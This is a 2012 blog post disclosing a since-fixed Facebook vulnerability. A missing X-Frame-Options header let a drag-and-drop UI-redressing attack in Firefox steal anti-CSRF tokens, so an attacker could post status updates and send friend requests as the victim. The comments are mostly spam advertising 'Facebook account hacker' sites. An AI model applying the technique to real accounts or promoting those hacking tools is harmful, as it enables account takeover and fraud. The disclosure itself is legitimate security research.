Friday, August 17, 2012

How Facebook lacked X-Frame-Options and what I did with it

In September 2011 I've discovered a vulnerability that allows attacker to partially take control over victim's Facebook account. Vulnerability allowed, among other things, to send status updates on behalf of user and send friend requests to attackers' controlled Facebook account. The vulnerability has been responsibly disclosed as part of Facebook Security Bug Bounty program and is now fixed.

Details

http[s]://www.facebook.com/plugins/serverfbml.php only used Javascript for frame-busting and did not use X-Frame-Options header. It was possible to create UI redressing content extraction attack to trick user into dragging HTML source of that page into attacker's page. This relied on Firefox ability to display view-source: protocol pages in iframes AND the ability to perform drag & drop actions cross origin (So only Firefox users were affected).

The mentioned page rendered FBML specified in the $_GET parameter. In this case <form><fb:captcha></form> had been used as an exemplary FBML payload. In the server response there was a Javascript Env object with multiple sensitive user values:
{
  user:100001652298988,
  locale:"en_US",
  method:"GET",
  start:(new Date()).getTime(),
  ps_limit:5,
  ps_ratio:4,
  svn_rev:441515,
  static_base:"https:\/\/s-static.ak.facebook.com\/",
  www_base:"http:\/\/www.facebook.com\/",
  rep_lag:2,
  post_form_id:"eecde0da0dc4bc800d385dde5dd37608",
  fb_dtsg:"AQAUh3Jx",
  lhsh:"0AQAQVvsl",
  error_uri:".....",
  retry_ajax_on_network_error:"1",
  ajaxpipe_enabled:"1",
  theater_ver:"2"
};
In the source, apart from user ID (privacy!), there are also two interesting values: fb_dtsg and post_form_id. These values alone are a form of anti CSRF token used in Facebook, and, by knowing them attacker could e.g. post status updates on behalf of a logged in user. In Firefox it was possible to trick the user to select & drag these values to attacker's controlled page.

So, if any user authenticated to Facebook navigated to attacker's URL (e.g. via a link shared by his friend) and played a game, attacker got access to HTML source of a vulnerable Facebook page and came into possession of user id and CSRF tokens. Having that, he could perform multiple CSRF requests, using the fact that victim's browser had appropriate FB cookies.

Demo

In the demo I'm using modified version of double drag&drop UI redressing technique developed by Nafeez Ahamed (@skeptic_fx). As an exploitation example, a status update for victim user is posted, and a friend request is sent to another user (e.g. attacker). Of course, possibly more is possible with these tokens like sharing, liking a given URL, but I haven't researched that.

Some fixes are quick, others...

Proposed fix was to use X-Frame-Options at the mentioned page. Vulnerability in Facebook has been fixed, tested and deployed before Oct 14, 2011. However, the relevant Firefox bug #605991 (Drag-and-drop may be used to steal content across domains) waited 2 years and the fix has just been deployed in Firefox 14. As of Firefox 14 you can no longer drag&drop content cross-domain. So - update your Firefoxes and stay safe!

Hungry for more?

11 comments:

homakov said...

I want cross framing to be denied since I was 4 years old boy :)
 http://homakov.blogspot.com/2012/06/saferweb-with-new-features-come-new.html

actually you can check alexa top 100 and continue hacking this way.. the same about csrf

Liza Karen said...

 Change banners by tab ads. Buttons have less space and are generally faster to load. Make sure your buttons are generally attractive and provide clearly what they redirect to. Do not have all your buttons in a single region: place them in different parts of your website. Use banner ad campaigns for your most important products only.  Köp Facebook Likes , Buy Facebook Fans, FB Likes

gardendecors lebanon said...

Excellent post! This is awesome. This is basically ideal and has included
great understanding to my knowing.
http://www.gardendecors.net

mike said...



I couldn’t refrain from commenting. Perfectly written! Ever wanted to hack your friends or foes facebook account? Worry not, we have the simplest and easiest tool to hack any facebook profile or account for free. Just visit www.hackfbaccount.net and start hacking.

Hack Facebook said...



Can I simply say what a comfort to uncover someone that really understands what they are discussing over the internet. You actually understand how to bring an issue to light and make it important. More people need to look at this and understand this side of the story. It's surprising you are not more popular given that you surely have the gift. Visit www.hackfbaccount.net to download facebook profile hacker and facebook hacker. Online facebook hacker and its all free now download www.hackfbaccount.net.

Brian Depp said...

for what is this used for, can i hack a fb account with that or????
can someone please tell me if it tried a site www.hack-facebook-password.org , i noticed this site on some fan page but still can't how to download this. can you help me please, or send me it to my inbox on a fb. thanks a lot

Hack Facebook said...



I was more than happy to discover this web site. I want to to thank you for ones time for this particularly wonderful read!! I definitely savored every bit of it and I have you bookmarked to see new stuff on your blog. Visit www.hackfbpassword.org to download facebook profile hacker and facebook hacker. Online facebook hacker and its all free now download www.hackfbpassword.org.





I was more than happy to discover this web site. I want to to thank you for ones time for this particularly wonderful read!! I definitely savored every bit of it and I have you bookmarked to see new stuff on your blog. Visit www.hackfbaccount.org to download facebook profile hacker and facebook hacker. Online facebook hacker and its all free now download www.hackfbaccount.org.!

Hack Facebook said...



Hi there! I could have sworn I’ve visited this site before but after going through many of the posts I realized it’s new to me. Regardless, I’m certainly pleased I came across it and I’ll be bookmarking it and checking back frequently! Learn how to hack a facebook account. Visit www.hackfbaccount.org for the latest facebook hacking tips, information and tools. :

Hack Facebook said...



May I simply say what a relief to uncover someone who really understands what they're talking about online. You definitely know how to bring an issue to light and make it important. More and more people really need to check this out and understand this side of your story. It's surprising you aren't more popular because you definitely have the gift. Download facebook account hacker at www.hackfbaccounts.org.

Malik Gupta said...

Thanks for the article, you can also Hack Facebook using his method

Joana Kane said...

Facebook is much more improved now.
http://www.fbpiraterfr.com/
http://gadgetspeaks.com/
http://aadhaarcarduid.org/
http://cheatjunction.com/hay-day-diamond-hack-cheats/